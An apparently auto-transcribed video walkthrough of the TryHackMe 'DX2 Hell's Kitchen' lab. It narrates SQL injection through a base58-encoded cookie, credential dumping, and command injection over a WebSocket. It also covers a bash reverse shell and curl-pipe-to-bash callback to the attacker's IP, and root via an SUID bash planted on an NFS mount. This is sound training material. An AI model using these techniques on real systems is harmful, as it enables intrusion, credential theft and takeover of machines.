What's up everybody, this is Hoodie. So today we're looking at DX2 Hell's Kitchen Room on TryHackMe. It's a hard level box and it's a week old. I took some time being MIA, so sorry for that, but I'll try to be more consistent. So let's just get on the box and I'll walk you guys through it. Let's just first connect the TryHackMe VPN. I made a directory for the CTF. I'll use threaded 3000 to scan ports on this particular IP. Right ahead, we got port 80 open, and let's see what's there. So, welcome to the town and fine hotel rooms, Hell's Kitchen, New York. So we got three buttons: About Us, Guest Book, and Book Your Room. About Us seems to give the information about the hotel owners, and these look like some potential usernames on the box. So it's nothing too serious there. You can go ahead and brute force password for these, but I don't think that's the way into the box. So now we can even book a room to their hotel. So, but when we click on the button, it says, unfortunately, the hotel is currently fully booked. Please try again later. Okay, so that's interesting. So we got an alert box. That means we do have JavaScript, and let's check it. So it's checkroom.js, and it's just fetching an API endpoint, making a request to this API endpoint. And if there's a booking button, and if the booking are not full, it will redirect us to this endpoint. Otherwise, it will just alert us. So as we see, the booking are full, but we got two new endpoints, the new booking and API rooms available. So let's go ahead and check that. I'll take the IP again, and we got other port open. So let's do this API. What was the name of it? Rooms available. Let's see what's there. We just got 6 in return. And let's see what's on new booking. We can just go ahead and directly visit this page. And it says no rooms are presently available. Please check again later. Okay, and let's see, we have a JS file. So we do have newbooking.js, and it's just there's a function called getCookie that's getting the cookie the server sent us, and there's another API endpoint that it send request to with the cookie it's getting from this function, and that's it. So let's see if we get the cookies. There we go. We have a booking key. This is the cookie. We can go ahead to CyberChef to see if we can decode this. It looks like some base encoded string. Let's see. There we go. We can and decode it from base 58, and it's booking ID 7124653. So that's interesting. Let's go back to the debugger, take this API endpoint, and we have a parameter booking key. Okay, so let's append this and let's see what we have. Let's try to paste this one. Let's see what we get. We can close this. We get bad request. So it looks like the server is expecting some base 58. And let's see. We put the base 58 cookie we had, and now we have not found. Okay, that's something new. And let's also check what's on port 4346. Take the IP again, and let's see, 4346. It's just a login portal for NYComm, and we don't have the username and password yet. Let's see if we have something in the source code. Nothing too serious. Nope. And let's try to run GoBuster on here. Hold up. GoBuster dir http. Let me copy the full URL. We can use user share word list derb common.txt. We can use that. Let's do 160 threads, and let's save it in file gobus.log. Let's see if we have something on here, but we'll look at it later. Let's check this API endpoint. API booking info booking key. I'll use the curl and curl. Let's see what we have. We got the same output. not found, we can append echo so that it won't come on the same line. And to test this out, we can either enumerate the booking IDs for some like idle stuff, kind of, but it's a very large number, so that doesn't seem to fit relevant here. But let's just copy this and let's paste it here. Oh, hold up. Let me copy that again. Paste it here. And let's see, 2 base 58. There we go. And let's see, we can go ahead and test for some SQL injection here. The infamous SQL payload. Let's see what we have when we put it there. Let's see, booking key, and we have not found. So it's executing our SQL, SQL query or the SQL payload. So we didn't get any error or some sort of, so we do have SQL injection here. We can use SQL map. We can do it manually. So, but we need to still find out which, which database it is. So we can use command substitution. We do have like echo hoodie base 58, just like base 54 command and in Linux. So we can take it from there. So we can do echo -n because by default echo adds a new line to the output, so we don't need that. We can do now order by to check how many columns are there. Let's start with the 3, and we can just pipe the output into base 58, right? So there we go. We can run this and let's see what we get. We get a bad request, so we need to decrease it by 1. Let's see what we have now. And I accidentally pressed backslash. There we go. Now we have again a bad request. What are we doing wrong? Let's go ahead and see. Oh, we forgot to specify this prefix. We need to booking ID. Now let's see. There we go. We have 2 columns. If we append 3 now, there we go. We have a bad request. So we know there are 2 columns and we can take it from there. We can now check for SQL like version or which database it is, union select 1, and we can go ahead and do version here. Version. Let's see if we have something bad request. We can go ahead and use version. This way, we still have a bad request. Let's check for SQLite, maybe. SQLite. Oh my, version. There we go. And now we got something. We got 3.4.3.0, so we are sure that it's a SQLite database. Now to enumerate more, we can take help from payload of all the things. There is some SQL injection payloads here. Where are they? There we go, SQL injection, SQLite injection, and let's see what we have. So we got the SQLite version. Next, we can extract database structure. Let's go ahead and copy this and let's see. Let's use this, and we don't need union select. We don't need this, and I think we're good to go. There we go. We got the database structure, room number, days, create table, booking temp, booking ID, room number, and the days. Next, we can extract maybe table names, and let's use this payload to check for table names. We can remove this, and let's see. We also have to remove the select because we already mentioned it, and it's just group concat. Group concat basically show all the column output into a single string. So we can extract the table name from here, from SQLite. And we have SQLite, so it does mean there is no backend MySQL server. It's just a file that the application is interacting with to get all these, database, to interact with the database. So we have email access, reservations, and booking temp. So we have these tables, but I think this is the interesting one. So let's see if we can extract the column name. Let's use this payload and let's extract the column name from email access table. Let's go ahead and paste this. We don't need the select, and I think we have to specify the table name here. It's email access. Let's see what we get. There we go. We get a guest name, email username, and the email password. That's interesting. So let's go ahead and just dump these two columns, email username and email password. Maybe we'll find something, and let's see what we have. Union select, we can do group concat email username and group concat email password from email access. This is the table name, and let's see. There we go. Now we're logged in, now we're logged in, now we're logged in. We got the username and there's the password. There we go. We can, I think, directly from email access, we can remove group concat and directly just output, here we go, email password, and we can just, use limit and offset to just hold up. Limit, I think we need to do it in all caps. Limit 1, offset 1. This will just output the second row and the first column. There we go. So we got the pet intent, and this is the password. So I'm back. I just got a phone call, so I had to attend it. So there we go. Now we found the username and the password to log in onto this web portal, and let's log in. Let's take the username Pedenton. I don't even know how to spell it. And Pedenton. Let's take the password and let's log in. We don't need this, and there we go. We are logged in, and let me zoom out. It's the email portal from Sweet Charity to, where is it? To Paul Denton. And this is the email, and we see some time here. Let's check the source code. Let's see if we found something interesting. So we found this JavaScript code, but it's minified, so we can use beautify.io to get a better view at the source code, and control enter. There we go. We can just go ahead and copy it and open it up, and our GoBuster is done. We found /mail and /ws. WS, I think it stands for WebSocket, and codium.js. I pasted here. There we go, and we can easily read it. So it's creating a elements variable that's taking all the elements from the source code, and it's going through a for loop, making a fetch request to this API endpoint, appending the email message ID, and showing us the content of email in base64 encoded. Okay, so that's nice. And another thing here is creating the WebSocket URL /ws, and it's setting up a time zone variable. The time zone we are looking at here is because of this variable. There we go. And it's just interacting with the socket directly, sending the time zone. Okay, that's cool. So we can go ahead and interact with this API endpoint too. So let's go there and let's see what we have. API /message/id. Query deserialized error cannot pass integer from empty string. We need to specify an integer here. So let's take message ID 1. That's cool. That's nice. So we got the base64 encoded string. Let's go to CyberChef and try to decode it. We can do it even in a terminal. We'll take a look at it later. So let's just go through CyberChef. Come on. Stop loading and show me. Okay, there we go. So we have another email, miss you. Okay, stop with the missing and the kisses. We can enumerate these so that we can, okay, let's just do it through the terminal here. I'll clear this up, and I can't do that. Let's take what we have here. I think, let's go ahead and do a network request. There we go. Request, response, cookies. So we have 2 cookies and the URL. So we can just go ahead and curl it up, but we won't see any output because we need to specify the cookies, I guess. So we have a booking key. It's in all caps, right? Booking key is equal to this. Control Shift B, and another one is ID. That will take it from here. Copy all of that, and there we go. Now we press enter. There we go. We can see it, and we can append echo, all that stuff, so it will not be on the same line, and that's nice. And we can just, I think, directly base64 decode this in our terminal, base64-d, and there we go. We can use silent mode with curl, so it just shows the email, and we can use a for loop to loop through different message IDs. Let's just do up to 10, do curl, and here we can use $I. There we go. And let's see. Oh, we need to specify done here too because we're using a for loop. That's just the syntax. There we go. And wait. Okay, there we go. We see THM. Okay, this is our first flag, I guess, and thought I'd help you unload your boxes, but I'm tied down trying to get one of the medical analyzers working. Damn thing nearly lasered off on my finger. Okay, it's just basic talk. See you next Wednesday, and nothing else interesting. So I think we are done with the message ID here. I enumerated a couple of them, but we just found the flag here. Okay, that's done with. Let's go back to the mail/mail and see what we can do with the WebSocket. So as you know, it's client-side JavaScript, so we can directly interact with the socket, and let's try doing that. Control-Shift-I, go to our console, and see what we can do. Socket.send, and let's see. Let's just send hello. There we go. Nothing. Oh, we saw the hello, right? And it's just for like we see it just for like a second maybe, and that's because of this. It's I think scientific notification of a second or a millisecond maybe. That's right. So that's why we are seeing just for like a little bit. But we can open it up and burp and can see the direct output. But first of all, let's go back and try to exploit this using SQL map, making it easier. Let's take open up SQL map, intercept this request. We're just doing it for the learning purpose. Let's change it to asterisk maybe, or just remove that, send it to repeater, close this, Control Shift R to move to the repeater. Where's the request? Come on, bro. Oh, there we go. We found it. 10107736. Okay, it's from there. So I'm gonna use CO2 extension. You can download it from Bab Store. Go to extensions, Bab Store, search up CO2, and you can install it. And right click, go to extension CO2. It's super easy to send all this, like it will just give us the command to use using SQL map, right? So we don't need the quick keys here, remove that. Let's increase the level and risk to 3. Level, I guess, is just for parameter testing. It will test even more parameters, and risk will increase the payloads it's testing. So, you know, different type of payloads it will test using risk. And we can string match for true, and we're matching not found. There we go, because if we go back, and it's a bad request here, but when our payload is successful, we see not found here. If you want to see that, let's try again to base 58. There we go. Come on. And let's remove all of this, and we know it's booking ID, and let's do wow, order by 1 2. It's acting super slow here right now. I don't know. Look at this. Is my RAM full? What's going on? I don't want my VM to just pause right now. Okay, we got this, and let's go ahead and paste this up. Let's remove this and do this, and you'll see VC not found. So our SQL payload is successful. So it helps SQL map to identify, okay, the SQL injection is successful. Another thing, we can use technique union based because we know it's union based SQLi, and we can set the parameter here, booking key, and we know it's SQLite database. So all that stuff, and now we can just take the command and go to our terminal and use SQL map. SQL map, go here, and we're using a tamper script here, DX2 tamper.py. Let me make another terminal and show you what's that, DX2 tamper.py. There we go. So as you know, this payload, it's base 58 encoded, right? So we are using a tamper script in SQL map to tell SQL map to send all the payloads encoded in base 58. You can get this script using ChatGPT, but thanks to Ryan for providing us the script. And here we go. It's setting priority, so it's the first thing that SQL map will do before sending the payload. And it's just taking this booking ID as a prefix to the payload and encoding all of the payload use and including the prefix in base 58 and just giving us the encoded payload. That's all it's doing, and super easy. You can get the script using ChatGPT, and I'm going to press enter here. We got level 5 risk 3 string technique U for union-based SQL injection parameter, DBMS, and tamper script. So it was pretty quick. We need to specify dump here to dump the database, and let's see what we have. Okay, so it dumped the reservations database, and we know our username and password were in email access, Paul Denton, and this is the username. And there we go. This is how you can do it using SQL map. Pretty easy. And now we can close this up too, I guess, or maybe not. Let's just close this up, and now let's get back to the WebSocket, and let's move to the burp proxy WebSocket history, and let's see what we have. So we need to select to server, there we go, and send it to repeater, Control Shift R, repeater, and we need to turn this on, send. Let's see what we get. So we get the time here, right? This is the time zone. We can change it to UTC, send it. There we go. We see the UTC now. And if we just specify any command, Linux command here, UTC ID, and let's see what we get. Okay. Let's just do it using Asia Kolkata, maybe. Maybe UTC is not the answer. That's interesting. Can we do using command substitution, just the way we did here? Okay. Okay. That's new. It should work. Who am I? It's not working. Oh, do we need to close using semicolon? Oh, there we go, Gilbert. Okay, we need to add semicolon here again. Okay, my bad. We can use ID. There we go. UID Gilbert. Okay, now we can see the whole command output, not like here just for a millisecond. So let's see. Which bash? Okay. There we go. We have bin bash, and let's try to get a shell on the box. We can clear this up, close this out. We'll start a netcat listener. There we go. And we can use a bash reverse shell. Nice and clean. Bin bash command. Bin bash. I think I like to specify the whole which bash out path user bin bash. And we can use -i for interactive. Dev TCP 10.847.242 1337, and there we go. Now let's see what we get. Invalid. Okay, we get invalid. Let's try something else. User bin. Let's try to just pinger box, maybe up P80 and interface done 0. Let's try in verbose mode, and let's see if it can ping our box 10.847.242. There we go. Oh, I didn't even stop the command. Oh my god, my bad. Let's do this again. There we go. We do not get any output here. Let's just, instead of pinging, let's just try to curl or IP curl. 10.8.4.7.2.2. It should work. Why is it not working? Hold up. Can I do id command again? Let me see. Okay, I think I messed this up because of the ping command. It's not stopping now. And okay, wow. Let's go back to the URL and let's test here. We know we can use command substitution like let me do ls. I need to remove these. ls. No, I break. I broke it. Okay, I broke the machine, I guess. It's not working. Wait, let me do hold up, id, or let's just do who am I. Let's use another command substitution. Who am I? I need to specify it in double quotes here. Come on, bro, work. Come on. I need to, okay. Nope, I'm not seeing anything. There we go, we broke the box. Let me just go ahead and restart it and we'll be back. There we go. Okay, so keep that in mind. Don't ever just send a command that will just keep on running until you just control C there. Like somebody sitting on the box right now and like viewing the command output and just control C there. So keep that in mind. Otherwise, it's all good. Okay, we'll do it again and let's see. As the box boot up, we need to wait 30 seconds and let's see. Wow, man, that was something interesting. We messed up the box. We're hackers. We don't go around doing something off without actually making chaos. Okay, let me check my phone a little bit. We still got 10 seconds. So there we go. We have the box booted up again and I've logged in and let's check now. So I'll make a request here. Let's go back to burp, proxy, WebSocket history, and let's go down below to server. Let's send it to repeater, Control-Shift-R, and specify ID. Enter. There we go. We got our output here. So previously I just noticed I was using the port 80 on here, so that's why maybe it wasn't working because of that. But now we have spun up here, and let's try to curl our box now. Curl 10.8.4.7.2.4.2. There we go. And let's see what we get. Where is it? Curl, and it says invalid. Okay, maybe that's why. Nope, it again says invalid. Okay, that's fine. Can we check which bash? User bin bash. There we go. Can we wget http 10.8.4.7.2.4.2? Let's just make a file, touch t.txt, and save it to. Let's just do that. We're not getting a request using wget. Okay, maybe let's just do it using socket, like directly from our console. And I think we need to specify our double quotes here, and let's curl our IP here. Curl, there we go. Okay, we got it from here. Okay, never mind, burp suite. Never mind, maybe another time, it's your chance. Okay, so we got it from here. So one thing if you just notice here, by using command substitution, let's try to run command ID and take a closer look at the IST part here, and let's see. ID, we just see UID up here. We don't see the whole output. And we just make a guess, like maybe there is some length restriction of the command we are putting in. Okay, so we need to be as short as possible. You can't get a reverse shell by just pasting this whole command. Let's see, let's do that even. There we go. Let me paste this and let's see. It says invalid, right? So that means we can't run like a command after a certain length. So let's be as short as possible and let's make a reverse shell wrap.sh, or just maybe take a single name. Let's take h from hoodie and let's do bin bash. Let's just take the basic reverse shell, or let's just take that reverse shell wq, and let's do curl 10.8.4.7.2.4.2 h and pipe it into bash, directly execute our shell, and let's see what we get. It's 200, okay, but we didn't get the shell back. Okay, and what port are we using? 1337. So it turns out we can't actually get reverse shell on custom port. We'll get to know more about it when we have the shell access, but it's uh it's a good practice to check the basic ports. Like port 80 is used by the website, so we can go ahead and check port 443. And let's do this, and rm edge vi edge, and let's check if we get the shell on port 80, 443. Let's see if we can have the shell here, and again go ahead and run the command again, and let's see what we get. There we go, and let's see if we have a shell back. We should have a shell back, but we still aren't getting a shell back. Maybe let's try using another, maybe just use the bash reverse shell. Maybe that will work. Hold up, vi edge, there we go. Oh, my bad, guys, my bad. rm edge, I'm using my hack the box IP here, and I'll show it again, just for the sake. Read line, there we go, vi edge, just for the sake that we can't get a shell on port for 1337 or custom port. Let's see now. There we go. Wow, hoodie, what are you doing? Let's do it again. There you go. We still don't have a shell, but let's try changing our shell to port 443, and let's check now. 443. Let's see if we have a shell now. There we go. Very well. Very, very good. No? Oh, there we go. We got a shell on port 443. So that's a good practice to always check if you can't get a shell on basic like custom port. Make sure you check on the well-known ports. Maybe that you get a shell back, and now we can just stabilize our shell. Python texc import pdy.spawn bin bash. There we go. Control Z. Fix. I have an alias, and now we have our stabilized shell. We can do export term. Okay, exterm. Now we can clear. There we go. So we are Gilbert, and we got our shell access, and there we go. So let's go into the home directly. Let's see what we have. We got a dad.txt. That's interesting. Left ear not by the site -s. So if you just ls-l home, so it looks like it's from user Sandra. You know, Sandra left this not here, and if you check -ls-a, so you know this file is owned by Sandra, so we know this not is this not is left by Sandra, left here not by the site, so we can go ahead and check for files owned by user Sandra. There we go, and let's wait till it found something. And we even got a hoteljobs.txt here. Let's see. Home Sandra not.txt, and Sandra is the user that got our user flag, and there we go. We found /srv.dad. Let's see what we have. I can't deal with your attacks on my friend right now, Dad. I need to take some time away from the hotel. If you need access to the tone site, my password is where I'd rather be. Anywhere but here. So we got the password, and let's just su to Sandra, copy paste the password. There we go. We are Sandra user. We can bash -i for interactive, and let's go to Sandra's home directory, and we have our user flag, user.txt. There we go. 46 characters. We got a node. Tasks give us access to the home server, and get bags and stash ready. Talk to smuggler, and let's check for sudo permissions. What's up? What happened? Okay, you're pretty late to ask for a password here. Yo, what's happening? Wow, we can do, let's do sudo -s-l. So this time sudo will just directly take the output command like the password input from here. If we specify -s, there we go. Fuck you, man. Okay, so we got sudo permissions to stop the hotel website. Okay, that's interesting. We can stop website running on port 80, and if we check if there is a firewall, sudo ufw or ufw status, can we do that? Sudo ufw status, can we do this? Or it's gonna ask for a password. Never mind, we can check it later. Okay, so there is a pictures directory, and we have boss.jpg. We can go ahead and transfer it to our machine, I guess. lnp 1337 boss.jpg. I spelled it wrong. And we can transfer using netcat w3 10.8.47242 port 1337 and transfer this file, and let's see. Do we have it? What's up? Did I do something wrong? 1337 boss.jpg. Let's try increasing this. It's just the time it takes to like transfer the old byte, so it is successfully transferred. Why the hell it's not transferring? Okay, maybe it's because of the port, because there's 443, because there is UFW, there is a firewall, and maybe it's blocking all traffic from different ports, outgoing, ingoing, whatever. Maybe that's why you can't get the file here. Let's try on port 443 and let's see what we get. I think we can get the file now. There we go. We have boss.jpg, and let's try to open that up. So just make sure you use port 443 because we'll see Jojo find King of Hell's Kitchen. Okay, and as you know, in home directory we have a user Jojo, so it's his password. King of Hell's Kitchen, King of Hell's Kitchen, if I can write that correctly. There we go. We got Jojo now. Very cool. So we got now.txt, and Jojo, we will be publishing orders on a private NSF server mount soon. Address to be communicated. Okay, let's check for sudo -l. Are you gonna do that to me again? Man, this shell, bro. Hold up. ls-la. We don't even have. Never mind. Let's try to import pty. Let's try to stabilize the shell again. Maybe we'll be able to do that. Export term is equal to xterm. Let's see if we can do this now. Oh my god, this is so frustrating. The box is very good. It's just what's happening here. Let's try to use again the same trick, King of the Hell's Kitchen. I think I spelled it right. -S-L, and let's try to run it this time. We'll see what we can run with sudo. Come on, Jojo, you can do it. King of, there is no da. There is no D in there. King of Hell's Kitchen. Okay, there we go. Come on. Come on, Jojo. There we go. So it looks like we can run this command, mount NFS share as root. That's super interesting. That's good. So let's close this up and let's change the positions of these so we can have a better look. So we can mount NFS share on the box using root as a root user. So we can probably get PrivEsc, and let's see if it has a mount NFS Hectrix PrivEsc. Let's see if it has a, you know, Hectrix page. It definitely does, but we can do it by Google searching and setting up NFS share on our box and have that, you know. Okay, there we go. etc experts, PrivEsc using NFS misconfigurations. No, you don't understand. You don't understand, Hectrix. That's not what I'm looking for. Let's see, set up NFS share on Linux. Let's just Google that, and Linux NFS server, how to set up server and client. Okay, so I'll walk you guys through it. So we need to download NFS kernel server. I already did, so there we go. Next, we need to make a directory for our NFS server. There we go. Let's just make some shared directory in this folder. Let's see, make dir shared. Let's go, and we need to chmod ch on nobody no group to the shared directory. There we go. So it's not owned by somebody or anybody. There we go. So no one is the owner, and we need to also specify permissions for it so anybody can write into it. Let's just give it all permissions. Shared, yep. Next, we need to define access for NFS for the client that will be mounting our NFS share into. So we need to edit this file, etc export. There we go. And up here we need to specify our home hoodie. Hold up, pwd. There we go. Home hoodie DX2 Hell's Kitchen and shared. And we need to specify for everybody read-write permission sync, so the changes we make directly will be reflected back in the mounted share, and no subtree check. I think I'm right. No subtree check, rw sync. There we go. And next we need to export our shares. Sudo export fs-a. There we go. Export fs-a, making the file shareable everywhere. Syntax bad list option. Oh, I forgot to close the parenthesis here. There we go. Now we can do this. Okay, we're done. Next, setting up NFS on client and machine, and I think we're done. Now we can just directly mount into it. Okay, now we can start sudo systemctl start NFS kernel server. There we go. Now we can do sudo user sbin mount.nfs, so we can mount it, mount.nfs. Oh, hold up, we need to edit the port because we can only use port 80 or port 443. And I think it's in nfs.conf. There we go. And if we go down below, let's go down. And nfsd, where is it? Where is the port? There we go. We can use port 80 or port 443, but we are using our reverse shell on port 443, so we have to use port 80. And one more thing we need to do. Let's go back, exit this. Hold up. Exit. Who am I? Exit from this, so we can be Sandra user. And let's try to run the sudo command again so that we can close the port 80, right? So we can successfully mount it and we don't encounter with any errors. Just a safe measure to do that. There we go. So we can stop the web server running on port 80 with the sudo as Sandra user. Is it gonna ask for password? Is it gonna fucking ask for password, bro? Just for this purpose sake, let's do this. Because I can't deal with sudo -s. And let's try to run this command again. Just for purpose sake. And let's even go ahead and check ourselves if the port 80 is done for. Nope, it's still running. Okay, let's reload this. And it's not coming up. There we go. So port 80 is free now, and we can switch back to Jojo, King of Hell's Kitchen. There we go, Python -3. Wow. Import pdy pdy.spawn. It's super slow. Bin bash. There we go. Export term is equal to xterm. And now we can successfully mount sudo user sbin mount.conf mount.nfs, sorry, nfs, and let's just do echo king of hell's kitchen just for purpose sake, sudo -s so we don't have any error, tech o port at. Okay, I see what's happening here. Let me make my shell right. std rows 8 columns 159. There we go. Now it shouldn't break like that. Echo king of hell's kitchen sudo. I forgot to close the single quote sudo this, and we can run mount.nfs tech-o port 80 for like tech-o for specifying extra switches for mounting, and we know our IP. And the share we have right now is home hoodie DX2 Hell's Kitchen. I spelled it wrong. DX2 Hell's Kitchen and shared. And we're gonna mount it here. There we go. Or I again forgot a single step here. Let me do this, and let's make a directory for share for get root maybe, and let's copy the command and get root to mount it in this folder, and let's see what we have now. We can close this. Let's wait for the command to complete, and let's see. It's asking for Jojo's password. King of Hell's Kitchen. You see how messed up this machine looks like? Command not found. Okay, buddy. Let's see. Can we do just this? Sudo, I don't know why King of Hell's Kitchen. I typed the password right. Let's see what we have. Come on, it's super slow. Bro, what the fuck? There we go, we can mount it here like this, and okay, it's done. We can get cd into get root. There we go, we have nothing. But let's go to shared and let's just try to copy bin bash here, right? Let's see what we have. We have bash, but it's owned by somebody username, a user with the UID 1000, right? Let's see. Let's sudo copy bin bash here. Let's see now what we have. Okay, we still have. Let's change its permissions. Sudo ch on root bash. Let's see what we have. Root. Let's check again. So it's owned by the root, and let's make it chmod suid. So this is how we can copy our bash into this and give it a suid, and now we can run it in privileged mode so to get the root, but we can't because it's our bash and it's not the machine bash, so it will just throw up some errors of libc, so what we can do is sudo rm bash. Okay, so what we need to do is copy our, hold up, w3 10.8.47242.443 and copy our bin bash from the box we are like from the box's bash to this directory netcat lnp and 443 bash. There we go. Let's do that and let's see. As we copied the bash from that box, we shouldn't have any error into it. So we can change its permissions and we can sudo chmod bash and let's see. There we go. And now we try to run it. Permission denied. Nobody, you need to. Let's see if we have the right permissions. Why is it specifying like a GID here? It should be in small. Let me turn into root and let's do it now. Let's do it chmod 777 bash, hold up, bash, chmod plus bash, and let's see. There we go. We got it now. Yes, now we can run bash-p. And finally, we are root. Let's go. Who am I? Root. We have the effective UID of root. We can python 3-c import os.system. I need to specify double quotes here. Bin bash. There we go. Oh, uh-oh. Hold up. We are this. We need to even os.set UID to 0. os.set GID to 0. And there we go. That's the way to bypass it. Okay, now we are properly root on the box and I'm super tired because I haven't slept in quite a while. And that was the box, guys. You can go ahead and root and wc root.txt. There we go, that's the root flag. These were the 3 flags you needed to solve the box. Kudos to Ekminas for making such a good room. I even quite learned a few things while doing this, and that was the room, guys. If you have any queries, ping me on Discord, comment down below, and please subscribe to my channel. I'll be making more content, but as I get time, because my college is starting from August 1, and let's see what we can do. So hang in there with me, bear with me, and I'll see you till next time. See you guys. Have a good weekend.